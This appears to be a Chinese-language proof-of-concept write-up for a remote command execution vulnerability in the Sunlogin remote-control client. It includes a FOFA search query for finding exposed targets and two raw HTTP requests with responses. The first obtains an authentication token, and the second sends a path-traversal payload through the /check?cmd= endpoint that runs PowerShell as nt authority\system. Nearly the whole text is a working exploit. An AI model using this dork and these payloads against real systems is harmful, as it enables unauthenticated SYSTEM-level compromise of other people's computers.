FOFA语句 body=”Verification failure”

    本地复现: tasklist |findstr SunloginClient.exe 寻找pid
    找端口: netstat -ano|findstr pid
    端口为0.0.0.0的监听

    1. GET /cgi-bin/rpc?action=verify-haras HTTP/1.1
    2. Host: 192.168.88.164:50327
    3. User-Agent: wengenb
    4. Accept-Encoding: gzip, deflate
    5. Accept: */*
    6. Connection: keep-alive
    8. HTTP/1.1 200 OK
    9. Cache-Control: no-cache
    10. Content-Type: text/html
    11. Content-Length: 87
    13. {"__code":0,"enabled":"1","verify_string":"DTOAQFngEPZBDNNp5QLOYftzErN7RBCA","code":0}

    会返回认证COOKIE
    携带COOKIE发包

    1. GET /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami HTTP/1.1
    2. Host: 192.168.88.164:50327
    3. User-Agent: wengenb
    4. Accept-Encoding: gzip, deflate
    5. Accept: */*
    6. Connection: keep-alive
    7. Cookie: CID=DTOAQFngEPZBDNNp5QLOYftzErN7RBCA;
    9. HTTP/1.1 200 OK
    10. Cache-Control: no-cache
    11. Content-Type: text/json
    12. Content-Length: 21
    14. nt authority\system

    漏洞成功验证截图
    image.png